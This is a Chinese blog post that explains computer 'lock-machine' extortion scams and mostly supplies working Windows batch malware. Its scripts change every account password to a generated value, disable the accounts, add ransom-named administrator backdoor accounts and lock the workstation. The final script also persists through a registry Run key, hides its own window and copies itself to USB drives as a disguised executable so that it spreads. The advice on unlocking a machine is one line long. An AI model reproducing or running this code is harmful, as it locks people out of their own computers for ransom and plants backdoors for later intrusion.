最近有好多網上瘋傳的軟件(刷鑽、xx游戲輔助類軟件),搞的好多小學生的電腦都被鎖機了,只留下一個用戶:要密碼加Qxxx(其中xxx代表QQ號),加完QQ還他媽要紅包,這就是典型的放完R,又他媽平a帶了暴擊,所以呢今天抽了點時間我就給大家帶來一篇有關電腦鎖機方面的原理、源碼、以及在拿到對方鎖機源碼和未拿到鎖機源碼時的破解方法,提到鎖機我們有必要簡單的了解一下關於鎖機方面的基本概念。
一、概念部分
① 鎖機:就是鎖定你的計算機,簡而言之就是給你的計算機上了密碼,讓你無法正常使用,這里的所謂鎖機呢就是通過做的非法軟件強制繞過系統賬戶在未知你電腦舊密碼時給你電腦強行上鎖(開機密碼),我這里所說的強行上鎖是在點擊鎖機軟件時獲取管理員權限,然后運行鎖機代碼!
②用戶:簡而言之就是你系統的帳號、登陸的帳號、這里所說的用戶概念只對針在計算機,就是你以什么樣的身份去用這台電腦(管理員/普通用戶/來賓用戶/還是黑客非法獲取管理員權限的用戶/...)
③密碼:一種混淆技術,使用者希望將自己能識別的信息轉變為別人無法識別的信息的一種技術,當然這個密碼在某個人得知你密碼加密算法的時候能夠去破解,舉個簡單的例子就是你銀行卡的密碼,而你的密碼算法是出生年月+00,這里的年月統一為兩位,一位時默認在前面+0,那么如果你的出生年月是91年的4月份,那么這個銀行卡的密碼就是:910400,但是沒人會在現實中告訴你我的銀行卡密碼算法原理,然后給你銀行卡讓你去取錢是吧,如果有,那么這個人是....,額,扯遠了,但是呢,這個加密算法在計算機里面就不一樣了,因為你可以通過源碼獲取到加密算法,從而通過加密算法得知密碼,貌似扯遠了,說到計算機加密和解密去了!但是呢這是我舉的一個簡單的例子來幫助那些非計算機人士更直觀,更簡單的去理解!
二、鎖機原理
鎖機的最基本原理就是通過外界寫的程序去調用你計算機里面的net.exe這個應用程序,在得知這個根源的情況下,那么簡單的介紹下這個net.exe的用法。
例子:
①:net user --列出系統內所有用戶
②:net user administrator 123 --將 administrator這個用戶的開機密碼強制改為123
③:net user aeon 123 /add --新建一個用戶名為 aeon 密碼為 123的用戶
④:net localgroup administrators aeon /add --將新建的這個用戶權限提升為管理員 ,提升管理員的好處就是留后門,方便以后入侵(當然是在得知對方IP以及開啟3389端口的情況下,至於如何設置軟件去獲取對方IP地址以及開啟3389端口,獲取到的IP必須要傳給你,讓后你可以隨心所欲將他電腦遠程當自己電腦一樣玩了,別急接下來提到)
⑤:net user %username% 123 --將當前用戶的密碼強制改為123,%username%系統變量,代表當前用戶
⑥:net user administrator /active:no --禁用administrator這個用戶的登陸權限,開啟用 active:yes即可,將administrator換成 %username%效果更好,原因你懂的...哈哈!
⑦:rundll32.exe user32.dll,LockWorkStation --鎖定用戶、相當於win+l 快捷鍵的效果,鎖定之后就會要求重新輸入密碼,原因你懂的...哈哈!
⑧:shutdown -s -t 10 --設置關機倒計時,這里設置10秒后關機,然后對方輸密碼,原因你懂的...哈哈!
還有一種情況,比如對方電腦有多個用戶的情況下,我們只改掉一個當前用戶的密碼,其它的都沒改掉,那么豈不是白費了?對,那么接下來我給大家介紹一下通過循環去遍歷當前系統內的所有用戶,然后你各種操作(改密碼、禁掉它的登陸權限、以及刪除...)因為是個鎖機,我們沒必要去搞破壞,所以最好別刪人家機子上數據,刪除重要數據會被判刑的!
⑨:@echo off --以下就是通過for /f循環批量遍歷出系統內的所有用戶,並將遍歷出來的所有用戶密碼改為123,並且禁掉所有用戶登陸權限的代碼
1 echo 所有用戶帳號ID為: 2 echo. 3 for /f "skip=4 tokens=1-3" %%a in ('net user') do ( 4 if not "%%a"=="命令成功完成。" echo net user %%a 123 & net user %%a 123 & net user %%a /active:no 5 if not "%%b"=="" echo net user %%b 123 & net user %%b 123 & net user %%b /active:no 6 if not "%%c"=="" echo net user %%c 123 & net user %%c 123 & net user %%c /active:no 7 ) 8 echo. 9 echo net user %username% 123 & net user %username% 123 10 pause>nul
當然以上鎖機的缺陷就是容易被破解!因為密碼以明文的形式寫出來了,只要拿到軟件源碼就可以破解掉,接下來我們改進下代碼,定義一下屬於自己唯一並且簡單的算法達到即使別人拿到源碼,又不懂算法的情況下,又或者即使有破解軟件(哈勃、360類)破解出來的密碼也無法使用,因為這個密碼采用我們定義的一個簡單算法(當然這個算法規則只有定義鎖機軟件的人才知道,又或者是拿到鎖機軟件,能看懂源代碼的人才知道,當然能看懂算法源代碼的人很少,這只是在簡單算法和程序不加殼的情況下)+一些隨機數
代碼如下:
1 set opw=lzj_ 2 set rnum=%random% 3 set npw=%opw%%rnum:~-2%%rnum:~-3% 4 net user administrator %npw% & 5 net user Administrator %npw% & 6 net user %username% %npw% & 7 net user 要密碼加QQ360665490 %npw% /add & 8 net user aeon%rnum% %npw% /add & 9 net localgroup administrators 要密碼加QQ360665490 /add & 10 net localgroup administrators aeon%rnum% /add & 11 net user %username% /active:yes & 12 net user 要密碼加QQ360665490 /active:yes & 13 net user aeon%rnum% /active:yes & 14 rundll32.exe user32.dll,LockWorkStation
然后在通過前面的for /f改進下,代碼如下:
1 set opw=lzj_ 2 set rnum=%random% 3 set npw=%opw%%rnum:~-2%%rnum:~-3% 4 for /f "skip=4 tokens=1-3" %%a in ('net user') do ( 5 if not "%%a"=="命令成功完成。" net user %%a %npw%& net user %%a /active:no 6 if not "%%b"=="" net user %%a %npw% & net user %%b /active:no 7 if not "%%c"=="" net user %%b %npw% & net user %%c /active:no 8 ) 9 ::此處加入新建兩個用戶的代碼、如 10 net user aeon%rnum% %npw% /add 11 net user 要密碼加QQ360665490 %npw% /add
由於時間原因我就簡單的整理了下,總體代碼如下:
1 ::根據標識簡單判斷該代碼是否執行過,如果之前執行過、則不執行鎖機代碼、如果是第一次執行,那么先去執行鎖機 2 if exist c:\aeon_flag ( 3 goto scanU 4 ) else ( goto lock ) 5 ::循環遍歷出當前系統內的所有用戶、改掉用戶密碼及禁掉登陸權限 6 :lock 7 set opw=lzj_ 8 set rnum=%random% 9 set npw=%opw%%rnum:~-2%%rnum:~-3% 10 for /f "skip=4 tokens=1-3" %%a in ('net user') do ( 11 if not "%%a"=="命令成功完成。" net user %%a %npw% & net user %%a /active:no 12 if not "%%b"=="" net user %%b %npw% & net user %%b /active:no 13 if not "%%c"=="" net user %%c %npw% & net user %%c /active:no 14 ) 15 ::添加兩個用戶(一個隨機標識用戶、一個管理員) 16 net user aeon%rnum% %npw% /add 17 net user aeon%rnum% /active:yes 18 net user 要密碼加QQ360665490 %npw% /add 19 net user 要密碼加QQ360665490 /active:yes 20 net localgroup administrators 要密碼加QQ360665490 /add & 21 net localgroup administrators aeon%rnum% /add 22 md c:\aeon_flag 23 ::每隔20分鍾進行一次掃描、如果掃描到有U盤時、則將自己拷貝到所掃描到的U盤上(並重命名)、達到通過U盤傳播 24 :scanU 25 if "%1" == "h" goto :go 26 mshta vbscript:createobject("wscript.shell").run("%~nx0 h",0)(window.close) & 0.0 27 :go 28 reg add hkey_local_machineSoftwareMicrosoftWindowsCurrentVersionRun /v run /t REG_SZ /d "%~f0" /f 29 :loop 30 for /f "skip=1" %%i in ('wmic LOGICALDISK where "drivetype=2" get name') do ( 31 if not "%%i"=="" echo f|xcopy %0 %%i\我的隱私.exe 32 ) 33 ::設定掃描時間為1200秒、也就是20分鍾 34 ping -n 1200 127.0.0.1>nul & goto :scanU
那么這種相比前面那種是不是更難看懂呢(其實這只是最簡單的自定義算法了)、再搞難一點自己隨機一個標識用戶,一個隨機密碼,在那邊搭建個服務器,將隨機到機器標識和密碼上傳到自己搭建的服務器,存入數據庫即可!
針對這種破解方法,只能借助第三方工具,去做個PE盤,然后進入PE,清除下密碼就O了!
這是我來到這個園子內的第一篇處女作品,難免會出錯,加上時間緊急沒有特別詳細的去附截圖,有什么疑問或者要求盡管提出來,我會在第一時間回復、大家共同學習!
聲明:以上源代碼純屬原創,不可用於非法用途,否則后果自負!
如果園子內還有那位大佬,還懂鎖機以及鎖機破解類的,寫一篇文章出來,然后在評論區附上文章地址,讓小弟借鑒借鑒!